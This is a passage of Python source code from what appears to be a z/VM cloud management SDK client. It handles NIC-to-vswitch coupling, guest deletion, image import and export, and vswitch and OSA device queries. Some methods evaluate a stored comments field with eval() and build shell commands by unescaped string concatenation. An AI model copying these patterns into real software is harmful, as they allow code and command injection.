self._NetDbOperator.switch_update_record_with_switch(userid, vdev, vswitch_name) msg = ('Couple nic device %(vdev)s of guest %(vm)s ' 'with vswitch %(vsw)s successfully' % {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name}) LOG.info(msg) def couple_nic_to_vswitch(self, userid, nic_vdev, vswitch_name, active=False): """Couple nic to vswitch.""" if active: msg = ("both in the user direct of guest %s and on " "the active guest system" % userid) else: msg = "in the user direct of guest %s" % userid LOG.debug("Connect nic %s to switch %s %s", nic_vdev, vswitch_name, msg) self._couple_nic(userid, nic_vdev, vswitch_name, active=active) def _uncouple_active_exception(self, error, userid, vdev): if ((error.results['rc'] == 204) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=12, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _uncouple_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 404) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)): obj_desc = "Guest %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=13, vdev=vdev, userid=userid, obj=obj_desc) else: raise error def _uncouple_nic(self, userid, vdev, active=False): """Uncouple NIC from vswitch""" if active: self._is_active(userid) msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) requestData = ' '.join(( 'SMAPI %s' % userid, "API Virtual_Network_Adapter_Disconnect_DM", "--operands", "-v %s" % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: results = err.results emsg = err.format_message() if ((results is not None) and (results['rc'] == 212) and (results['rs'] == 32)): LOG.warning("Virtual device %s is already disconnected " "in the guest's user direct", vdev) else: LOG.error("Failed to uncouple nic %s in the guest's user " "direct, error: %s" % (vdev, emsg)) self._uncouple_inactive_exception(err, userid, vdev) """Update information in switch table.""" self._NetDbOperator.switch_update_record_with_switch(userid, vdev, None) # the inst must be active, or this call will failed if active: requestData = ' '.join(( 'SMAPI %s' % userid, 'API Virtual_Network_Adapter_Disconnect', "--operands", "-v %s" % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: results = err.results emsg = err.format_message() if ((results is not None) and (results['rc'] == 204) and (results['rs'] == 48)): LOG.warning("Virtual device %s is already " "disconnected on the active " "guest system", vdev) else: LOG.error("Failed to uncouple nic %s on the active " "guest system, error: %s" % (vdev, emsg)) self._uncouple_active_exception(err, userid, vdev) msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def uncouple_nic_from_vswitch(self, userid, nic_vdev, active=False): if active: msg = ("both in the user direct of guest %s and on " "the active guest system" % userid) else: msg = "in the user direct of guest %s" % userid LOG.debug("Disconnect nic %s with network %s", nic_vdev, msg) self._uncouple_nic(userid, nic_vdev, active=active) def delete_userid(self, userid): rd = ' '.join(('deletevm', userid, 'directory')) try: self._request(rd) except exception.SDKSMTRequestFailed as err: if err.results['rc'] == 400 and err.results['rs'] == 4: # guest vm definition not found LOG.debug("The guest %s does not exist." % userid) return else: msg = "SMT error: %s" % err.format_message() raise exception.SDKSMTRequestFailed(err.results, msg) def delete_vm(self, userid): self.delete_userid(userid) # revoke userid from vswitch action = "revoke id %s authority from vswitch" % userid with zvmutils.log_and_reraise_sdkbase_error(action): switch_info = self._NetDbOperator.switch_select_record_for_userid( userid) switch_list = set() for item in switch_info: switch_list.add(item['switch']) for item in switch_list: if item is not None: self.revoke_user_from_vswitch(item, userid) # cleanup db record from network table action = "delete network record for user %s" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._NetDbOperator.switch_delete_record_for_userid(userid) # TODO: cleanup db record from volume table pass # cleanup persistent folder for guest self._pathutils.remove_guest_path(userid) # cleanup db record from guest table action = "delete guest %s from database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._GuestDbOperator.delete_guest_by_userid(userid) def execute_cmd(self, userid, cmdStr): """"cmdVM.""" requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\'' with zvmutils.log_and_reraise_smt_request_failed(action='execute ' 'command on vm via iucv channel'): results = self._request(requestData) ret = results['response'] return ret def execute_cmd_direct(self, userid, cmdStr): """"cmdVM.""" requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\'' results = self._smt.request(requestData) return results def image_import(self, image_name, url, image_meta, remote_host=None): """Import the image specified in url to SDK image repository, and create a record in image db, the imported images are located in image_repository/prov_method/os_version/image_name/, for example, /opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100""" image_info = [] try: image_info = self._ImageDbOperator.image_query_record(image_name) except exception.SDKObjectNotExistError: msg = ("The image record %s doens't exist in SDK image datebase," " will import the image and create record now" % image_name) LOG.info(msg) # Ensure the specified image is not exist in image DB if image_info: msg = ("The image name %s has already exist in SDK image " "database, please check if they are same image or consider" " to use a different image name for import" % image_name) LOG.error(msg) raise exception.SDKImageOperationError(rs=13, img=image_name) try: image_os_version = image_meta['os_version'].lower() target_folder = self._pathutils.create_import_image_repository( image_os_version, const.IMAGE_TYPE['DEPLOY'], image_name) except Exception as err: msg = ('Failed to create repository to store image %(img)s with ' 'error: %(err)s, please make sure there are enough space ' 'on zvmsdk server and proper permission to create the ' 'repository' % {'img': image_name, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKImageOperationError(rs=14, msg=msg) try: import_image_fn = urlparse.urlparse(url).path.split('/')[-1] import_image_fpath = '/'.join([target_folder, import_image_fn]) self._scheme2backend(urlparse.urlparse(url).scheme).image_import( image_name, url, import_image_fpath, remote_host=remote_host) # Check md5 after import to ensure import a correct image # TODO change to use query image name in DB expect_md5sum = image_meta.get('md5sum') real_md5sum = self._get_md5sum(import_image_fpath) if expect_md5sum and expect_md5sum != real_md5sum: msg = ("The md5sum after import is not same as source image," " the image has been broken") LOG.error(msg) raise exception.SDKImageOperationError(rs=4) # After import to image repository, figure out the image type is # single disk image or multiple-disk image,if multiple disks image, # extract it, if it's single image, rename its name to be same as # specific vdev # TODO: (nafei) use sub-function to check the image type image_type = 'rootonly' if image_type == 'rootonly': final_image_fpath = '/'.join([target_folder, CONF.zvm.user_root_vdev]) os.rename(import_image_fpath, final_image_fpath) elif image_type == 'alldisks': # For multiple disks image, extract it, after extract, the # content under image folder is like: 0100, 0101, 0102 # and remove the image file 0100-0101-0102.tgz pass # TODO: put multiple disk image into consideration, update the # disk_size_units and image_size db field disk_size_units = self._get_disk_size_units(final_image_fpath) image_size = self._get_image_size(final_image_fpath) # TODO: update the real_md5sum field to include each disk image self._ImageDbOperator.image_add_record(image_name, image_os_version, real_md5sum, disk_size_units, image_size, image_type) LOG.info("Image %s is import successfully" % image_name) except Exception: # Cleanup the image from image repository self._pathutils.clean_temp_folder(target_folder) raise def image_export(self, image_name, dest_url, remote_host=None): """Export the specific image to remote host or local file system :param image_name: image name that can be uniquely identify an image :param dest_path: the location to store exported image, eg. /opt/images, the image will be stored in folder /opt/images/ :param remote_host: the server that export image to, the format is username@IP eg. nova@192.168.99.1, if remote_host is None, it means the image will be stored in local server :returns a dictionary that contains the exported image info { 'image_name': the image_name that exported 'image_path': the image_path after exported 'os_version': the os version of the exported image 'md5sum': the md5sum of the original image } """ image_info = self._ImageDbOperator.image_query_record(image_name) if not image_info: msg = ("The image %s does not exist in image repository" % image_name) LOG.error(msg) raise exception.SDKImageOperationError(rs=20, img=image_name) image_type = image_info[0]['type'] # TODO: (nafei) according to image_type, detect image exported path # For multiple disk image, make the tgz firstly, the specify the # source_path to be something like: 0100-0101-0102.tgz if image_type == 'rootonly': source_path = '/'.join([CONF.image.sdk_image_repository, const.IMAGE_TYPE['DEPLOY'], image_info[0]['imageosdistro'], image_name, CONF.zvm.user_root_vdev]) else: pass self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export( source_path, dest_url, remote_host=remote_host) # TODO: (nafei) for multiple disks image, update the expect_dict # to be the tgz's md5sum export_dict = {'image_name': image_name, 'image_path': dest_url, 'os_version': image_info[0]['imageosdistro'], 'md5sum': image_info[0]['md5sum']} LOG.info("Image %s export successfully" % image_name) return export_dict def _get_image_disk_size_units(self, image_path): """ Return a comma separated string to indicate the image disk size and units for each image disk file under image_path For single disk image , it looks like: 0100=3338:CYL For multiple disk image, it looks like: 0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL""" pass def _get_disk_size_units(self, image_path): command = 'hexdump -n 48 -C %s' % image_path (rc, output) = zvmutils.execute(command) LOG.debug("hexdump result is %s" % output) if rc: msg = ("Error happened when executing command hexdump with" "reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=5) try: root_disk_size = int(output[144:156]) disk_units = output[220:223] root_disk_units = ':'.join([str(root_disk_size), disk_units]) except ValueError: msg = ("Image file at %s is missing built-in disk size " "metadata, it was probably not captured by SDK" % image_path) LOG.error(msg) raise exception.SDKImageOperationError(rs=6) if 'FBA' not in output and 'CKD' not in output: raise exception.SDKImageOperationError(rs=7) LOG.debug("The image's root_disk_units is %s" % root_disk_units) return root_disk_units def _get_image_size(self, image_path): """Return disk size in bytes""" command = 'du -b %s' % image_path (rc, output) = zvmutils.execute(command) if rc: msg = ("Error happened when executing command du -b with" "reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=8) size = output.split()[0] return size def _get_image_path_by_name(self, image_name): try: target_info = self._ImageDbOperator.image_query_record(image_name) except exception.SDKObjectNotExistError: msg = ("The image %s does not exist in image repository" % image_name) LOG.error(msg) raise exception.SDKImageOperationError(rs=20, img=image_name) # TODO: (nafei) Handle multiple disks image deploy image_path = '/'.join([CONF.image.sdk_image_repository, const.IMAGE_TYPE['DEPLOY'], target_info[0]['imageosdistro'], image_name]) return image_path def _scheme2backend(self, scheme): try: return { "file": FilesystemBackend, "http": HTTPBackend, # "https": HTTPSBackend }[scheme] except KeyError: msg = ("No backend found for '%s'" % scheme) LOG.error(msg) raise exception.SDKImageOperationError(rs=2, schema=scheme) def _get_md5sum(self, fpath): """Calculate the md5sum of the specific image file""" try: current_md5 = hashlib.md5() if isinstance(fpath, six.string_types) and os.path.exists(fpath): with open(fpath, "rb") as fh: for chunk in self._read_chunks(fh): current_md5.update(chunk) elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or isinstance(fpath, IOBase)): for chunk in self._read_chunks(fpath): current_md5.update(chunk) else: return "" return current_md5.hexdigest() except Exception: msg = ("Failed to calculate the image's md5sum") LOG.error(msg) raise exception.SDKImageOperationError(rs=3) def _read_chunks(self, fh): fh.seek(0) chunk = fh.read(CHUNKSIZE) while chunk: yield chunk chunk = fh.read(CHUNKSIZE) else: fh.seek(0) def image_delete(self, image_name): # Delete image file try: self._delete_image_file(image_name) # Delete image record from db self._ImageDbOperator.image_delete_record(image_name) except exception.SDKImageOperationError as err: results = err.results if ((results['rc'] == 300) and (results['rs'] == 20)): LOG.warning("Image %s does not exist", image_name) return else: LOG.error("Failed to delete image %s, error: %s" % (image_name, err.format_message())) raise msg = ('Delete image %s successfully' % image_name) LOG.info(msg) def _delete_image_file(self, image_name): image_path = self._get_image_path_by_name(image_name) self._pathutils.clean_temp_folder(image_path) def image_query(self, imagename=None): return self._ImageDbOperator.image_query_record(imagename) def image_get_root_disk_size(self, image_name): """Return the root disk units of the specified image image_name: the unique image name in db Return the disk units in format like 3339:CYL or 467200:BLK """ image_info = self.image_query(image_name) if not image_info: raise exception.SDKImageOperationError(rs=20, img=image_name) disk_size_units = image_info[0]['disk_size_units'].split(':')[0] return disk_size_units def image_get_os_distro(self, image_name): """ Return the operating system distro of the specified image """ image_info = self.image_query(image_name) if not image_info: raise exception.SDKImageOperationError(rs=20, img=image_name) os_distro = image_info[0]['imageosdistro'] return os_distro def _get_image_disk_type(self, image_name): """ Return image disk type """ image_info = self.image_query(image_name) if ((image_info[0]['comments'] is not None) and (image_info[0]['comments'].__contains__('disk_type'))): image_disk_type = eval(image_info[0]['comments'])['disk_type'] if image_disk_type == 'DASD': return 'ECKD' elif image_disk_type == 'SCSI': return 'SCSI' else: return None else: return None def punch_file(self, userid, fn, fclass): rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" % {'uid': userid, 'file': fn, 'class': fclass}) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to punch file to userid '%s'," "error: %s" % (userid, err.format_message())) raise finally: os.remove(fn) def get_guest_connection_status(self, userid): '''Get guest vm connection status.''' rd = ' '.join(('getvm', userid, 'isreachable')) results = self._request(rd) if results['rs'] == 1: return True else: return False def _generate_disk_parmline(self, vdev, fmt, mntdir): parms = [ 'action=' + 'addMdisk', 'vaddr=' + vdev, 'filesys=' + fmt, 'mntdir=' + mntdir ] parmline = ' '.join(parms) parmstr = "'" + parmline + "'" return parmstr def process_additional_minidisks(self, userid, disk_info): '''Generate and punch the scripts used to process additional disk into target vm's reader. ''' for idx, disk in enumerate(disk_info): vdev = disk.get('vdev') or self.generate_disk_vdev( offset = (idx + 1)) fmt = disk.get('format') mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral', str(vdev)]) disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir) func_name = '/var/lib/zvmsdk/setupDisk' self.aemod_handler(userid, func_name, disk_parms) # trigger do-script if self.get_power_state(userid) == 'on': self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start") def aemod_handler(self, instance_name, func_name, parms): rd = ' '.join(['changevm', instance_name, 'aemod', func_name, '--invparms', parms]) action = parms[0] + instance_name with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_user_console_output(self, userid): # get console into reader rd = 'getvm %s consoleoutput' % userid action = 'get console log reader file list for guest vm: %s' % userid with zvmutils.log_and_reraise_smt_request_failed(action): resp = self._request(rd) with zvmutils.expect_invalid_resp_data(resp): rf_list = resp['response'][0].rpartition(':')[2].strip().split() # TODO: make sure reader device is online # via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online' # 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c' # 'which udevadm &> /dev/null && udevadm settle || udevsettle' logs = [] for rf in rf_list: cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf rc, output = zvmutils.execute(cmd) if rc == 0: logs.append(output) return ''.join(logs) def query_vswitch(self, switch_name): smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Query_Extended" % smt_userid, "--operands", '-k switch_name=%s' % switch_name )) try: results = self._request(rd) rd_list = results['response'] except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 212) and (err.results['rs'] == 40)): msg = 'Vswitch %s does not exist' % switch_name LOG.error(msg) obj_desc = "Vswitch %s" % switch_name raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') else: action = "query vswitch details info" msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) vsw_info = {} with zvmutils.expect_invalid_resp_data(): # ignore user_vlan_id part and jump to the vswitch basic info idx_end = len(rd_list) idx = 0 while((idx < idx_end) and not rd_list[idx].__contains__('switch_name')): idx = idx + 1 # The next 21 lines contains the vswitch basic info # eg, name, type, port_type, vlan_awareness, etc for i in range(21): rd = rd_list[idx + i].split(':') vsw_info[rd[0].strip()] = rd[1].strip() idx = idx + 21 # Skip the vepa_status while((idx < idx_end) and not rd_list[idx].__contains__('real_device_address') and not rd_list[idx].__contains__('port_num') and not rd_list[idx].__contains__('adapter_owner')): idx = idx + 1 def _parse_value(data_list, idx, keyword, offset=1): value = data_list[idx].rpartition(keyword)[2].strip() if value == '(NONE)': value = 'NONE' return idx + offset, value def _parse_dev_status(value): if value in const.DEV_STATUS.keys(): return const.DEV_STATUS[value] else: return 'Unknown' def _parse_dev_err(value): if value in const.DEV_ERROR.keys(): return const.DEV_ERROR[value] else: return 'Unknown' # Start to analyse the real devices info vsw_info['real_devices'] = {} while((idx < idx_end) and rd_list[idx].__contains__('real_device_address')): # each rdev has 6 lines' info idx, rdev_addr = _parse_value(rd_list, idx, 'real_device_address: ') idx, vdev_addr = _parse_value(rd_list, idx, 'virtual_device_address: ') idx, controller = _parse_value(rd_list, idx, 'controller_name: ') idx, port_name = _parse_value(rd_list, idx, 'port_name: ') idx, dev_status = _parse_value(rd_list, idx, 'device_status: ') idx, dev_err = _parse_value(rd_list, idx, 'device_error_status ') vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr, 'controller': controller, 'port_name': port_name, 'dev_status': _parse_dev_status( dev_status), 'dev_err': _parse_dev_err( dev_err) } # Under some case there would be an error line in the output # "Error controller_name is NULL!!", skip this line if ((idx < idx_end) and rd_list[idx].__contains__( 'Error controller_name is NULL!!')): idx += 1 # Start to get the authorized userids vsw_info['authorized_users'] = {} while((idx < idx_end) and rd_list[idx].__contains__('port_num')): # each authorized userid has 6 lines' info at least idx, port_num = _parse_value(rd_list, idx, 'port_num: ') idx, userid = _parse_value(rd_list, idx, 'grant_userid: ') idx, prom_mode = _parse_value(rd_list, idx, 'promiscuous_mode: ') idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ') idx, vlan_count = _parse_value(rd_list, idx, 'vlan_count: ') vlan_ids = [] for i in range(int(vlan_count)): idx, id = _parse_value(rd_list, idx, 'user_vlan_id: ') vlan_ids.append(id) # For vlan unaware vswitch, the query smcli would # return vlan_count as 1, here we just set the count to 0 if (vsw_info['vlan_awareness'] == 'UNAWARE'): vlan_count = 0 vlan_ids = [] vsw_info['authorized_users'][userid] = { 'port_num': port_num, 'prom_mode': prom_mode, 'osd_sim': osd_sim, 'vlan_count': vlan_count, 'vlan_ids': vlan_ids } # Start to get the connected adapters info # OWNER_VDEV would be used as the dict key for each adapter vsw_info['adapters'] = {} while((idx < idx_end) and rd_list[idx].__contains__('adapter_owner')): # each adapter has four line info: owner, vdev, macaddr, type idx, owner = _parse_value(rd_list, idx, 'adapter_owner: ') idx, vdev = _parse_value(rd_list, idx, 'adapter_vdev: ') idx, mac = _parse_value(rd_list, idx, 'adapter_macaddr: ') idx, type = _parse_value(rd_list, idx, 'adapter_type: ') key = owner + '_' + vdev vsw_info['adapters'][key] = { 'mac': mac, 'type': type } # Todo: analyze and add the uplink NIC info and global member info def _parse_switch_status(value): if value in const.SWITCH_STATUS.keys(): return const.SWITCH_STATUS[value] else: return 'Unknown' if 'switch_status' in vsw_info.keys(): vsw_info['switch_status'] = _parse_switch_status( vsw_info['switch_status']) return vsw_info def get_nic_info(self, userid=None, nic_id=None, vswitch=None): nic_info = self._NetDbOperator.switch_select_record(userid=userid, nic_id=nic_id, vswitch=vswitch) return nic_info def is_first_network_config(self, userid): action = "get guest '%s' to database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): info = self._GuestDbOperator.get_guest_by_userid(userid) # check net_set if int(info[3]) == 0: return True else: return False def update_guestdb_with_net_set(self, userid): action = "update guest '%s' in database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._GuestDbOperator.update_guest_by_userid(userid, net_set='1') def _is_OSA_free(self, OSA_device): osa_info = self._query_OSA() if 'OSA' not in osa_info.keys(): return False elif len(osa_info['OSA']['FREE']) == 0: return False else: dev1 = str(OSA_device).zfill(4).upper() dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper() dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper() if ((dev1 in osa_info['OSA']['FREE']) and (dev2 in osa_info['OSA']['FREE']) and (dev3 in osa_info['OSA']['FREE'])): return True else: return False def _query_OSA(self): smt_userid = zvmutils.get_smt_userid() rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid OSA_info = {} try: results = self._request(rd) rd_list = results['response'] except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 4) and (err.results['rs'] == 4)): msg = 'No OSAs on system' LOG.info(msg) return OSA_info else: action = "query OSA details info" msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) with zvmutils.expect_invalid_resp_data(): idx_end = len(rd_list) idx = 0 def _parse_value(data_list, idx, keyword, offset=1): value = data_list[idx].rpartition(keyword)[2].strip() return idx + offset, value # Start to analyse the osa devices info while((idx < idx_end) and rd_list[idx].__contains__('OSA Address')): idx, osa_addr = _parse_value(rd_list, idx, 'OSA Address: ') idx, osa_status = _parse_value(rd_list, idx, 'OSA Status: ') idx, osa_type = _parse_value(rd_list, idx, 'OSA Type: ') if osa_type != 'UNKNOWN': idx, CHPID_addr = _parse_value(rd_list, idx, 'CHPID Address: ') idx, Agent_status = _parse_value(rd_list, idx, 'Agent Status: ') if osa_type not in OSA_info.keys(): OSA_info[osa_type] = {} OSA_info[osa_type]['FREE'] = [] OSA_info[osa_type]['BOXED'] = [] OSA_info[osa_type]['OFFLINE'] = [] OSA_info[osa_type]['ATTACHED'] = [] if osa_status.__contains__('ATT'): id = osa_status.split()[1] item = (id, osa_addr) OSA_info[osa_type]['ATTACHED'].append(item) else: OSA_info[osa_type][osa_status].append(osa_addr) return OSA_info def _get_available_vdev(self, userid, vdev=None): ports_info = self._NetDbOperator.switch_select_table() vdev_info = [] for p in ports_info: if p['userid'] == userid.upper(): vdev_info.append(p['interface']) if len(vdev_info) == 0: # no nic defined for the guest if vdev is None: nic_vdev = CONF.zvm.default_nic_vdev else: nic_vdev = vdev else: if vdev is None: used_vdev = max(vdev_info) nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:] else: if self._is_vdev_valid(vdev, vdev_info): nic_vdev = vdev else: errmsg = ("The specified virtual device number %s " "has already been used." % vdev) raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) if ((len(nic_vdev) > 4) or (len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)): errmsg = ("Virtual device number %s is not valid" % nic_vdev) raise exception.SDKInvalidInputFormat(msg=errmsg) return nic_vdev def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False): nic_vdev = self._get_available_vdev(userid, vdev=vdev) if not self._is_OSA_free(OSA_device): errmsg = ("The specified OSA device number %s " "is not free" % OSA_device) raise exception.SDKConflictError(modID='network', rs=14, osa=OSA_device, userid=userid, msg=errmsg) LOG.debug('Nic attributes: vdev is %(vdev)s, ' 'dedicated OSA device is %(osa)s', {'vdev': nic_vdev, 'osa': OSA_device}) self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active) return nic_vdev def _dedicate_OSA_inactive_exception(self, error, userid, vdev, OSA_device): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=15, osa=OSA_device, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)): obj_desc = "Guest device %s" % vdev raise exception.SDKConflictError(modID='network', rs=15, osa=OSA_device, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=14, osa=OSA_device, userid=userid, msg=errmsg) else: raise error def _dedicate_OSA_active_exception(self, error, userid, OSA_device): if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or ((error.results['rc'] == 204) and (error.results['rs'] == 8)) or ((error.results['rc'] == 204) and (error.results['rs'] == 16))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=14, osa=OSA_device, userid=userid, msg=errmsg) else: raise error def _dedicate_OSA(self, userid, OSA_device, vdev, active=False): if active: self._is_active(userid) msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s ' 'to OSA device %(osa)s' % {'vdev': vdev, 'vm': userid, 'osa': OSA_device}) LOG.info(msg) def_vdev = vdev att_OSA_device = OSA_device for i in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Dedicate_DM' % userid, "--operands", "-v %s" % def_vdev, "-r %s" % att_OSA_device)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: LOG.error("Failed to dedicate OSA %s to nic %s for user %s " "in the guest's user direct, error: %s" % (att_OSA_device, def_vdev, userid, err.format_message())) # TODO revoke the dedicated OSA in user direct while (int(def_vdev, 16) != int(vdev, 16)): def_vdev = str(hex(int(def_vdev, 16) - 1))[2:] requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate_DM' % userid, "--operands", "-v %s" % def_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: if ((err2.results['rc'] == 404) and (err2.results['rs'] == 8)): pass else: LOG.error("Failed to Undedicate nic %s for user" " %s in the guest's user direct, " "error: %s" % (def_vdev, userid, err2.format_message())) pass self._dedicate_OSA_inactive_exception(err, userid, vdev, OSA_device) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:] if active: def_vdev = vdev att_OSA_device = OSA_device for i in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Dedicate' % userid, "--operands", "-v %s" % def_vdev, "-r %s" % att_OSA_device)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: LOG.error("Failed to dedicate OSA %s to nic %s for user " "%s on the active guest system, error: %s" % (att_OSA_device, def_vdev, userid, err.format_message())) # TODO revoke the dedicated OSA in user direct and active detach_vdev = vdev for j in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate_DM' % userid, "--operands", "-v %s" % detach_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: if ((err2.results['rc'] == 404) and (err2.results['rs'] == 8)): pass else: LOG.error("Failed to Undedicate nic %s for " "user %s in the guest's user " "direct, error: %s" % (def_vdev, userid, err2.format_message())) pass detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:] while (int(def_vdev, 16) != int(vdev, 16)): def_vdev = str(hex(int(def_vdev, 16) - 1))[2:] requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate' % userid, "--operands", "-v %s" % def_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err3: if ((err3.results['rc'] == 204) and (err3.results['rs'] == 8)): pass else: LOG.error("Failed to Undedicate nic %s for " "user %s on the active guest " "system, error: %s" % (def_vdev, userid, err3.format_message())) pass self._dedicate_OSA_active_exception(err, userid, OSA_device) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:] OSA_desc = 'OSA=%s' % OSA_device self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc) msg = ('Dedicate nic device %(vdev)s of guest %(vm)s ' 'to OSA device %(osa)s successfully' % {'vdev': vdev, 'vm': userid, 'osa': OSA_device}) LOG.info(msg) def _undedicate_nic_active_exception(self, error, userid, vdev): if ((error.results['rc'] == 204) and (error.results['rs'] == 44)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=16, userid=userid, vdev=vdev, msg=errmsg) else: raise error def _undedicate_nic_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=17, userid=userid, vdev=vdev, obj=obj_desc) else: raise error def _undedicate_nic(self, userid, vdev, active=False, del_active_only=False): if active: self._is_active(userid) msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) if not del_active_only: def_vdev = vdev for i in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate_DM' % userid, "--operands", "-v %s" % def_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: results = err.results emsg = err.format_message() if ((results['rc'] == 404) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist in " "the guest's user direct", vdev) else: LOG.error("Failed to undedicate nic %s for %s in " "the guest's user direct, error: %s" % (vdev, userid, emsg)) self._undedicate_nic_inactive_exception(err, userid, vdev) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] self._NetDbOperator.switch_delete_record_for_nic(userid, vdev) if active: def_vdev = vdev for i in range(3): rd = ' '.join(( "SMAPI %s API Image_Device_Undedicate" % userid, "--operands", '-v %s' % def_vdev)) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results emsg = err.format_message() if ((results['rc'] == 204) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist on " "the active guest system", vdev) else: LOG.error("Failed to undedicate nic %s for %s on " "the active guest system, error: %s" % (vdev, userid, emsg)) self._undedicate_nic_active_exception(err, userid, vdev) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def _request_with_error_ignored(self, rd): """Send smt request, log and ignore any errors.""" try: return self._request(rd) except Exception as err: # log as warning and ignore namelist operation failures LOG.warning(six.text_type(err)) def namelist_add(self, namelist, userid): rd = ''.join(("SMAPI %s API Name_List_Add " % namelist, "--operands -n %s" % userid)) self._request_with_error_ignored(rd) def namelist_remove(self, namelist, userid): rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist, "--operands -n %s" % userid)) self._request_with_error_ignored(rd) def 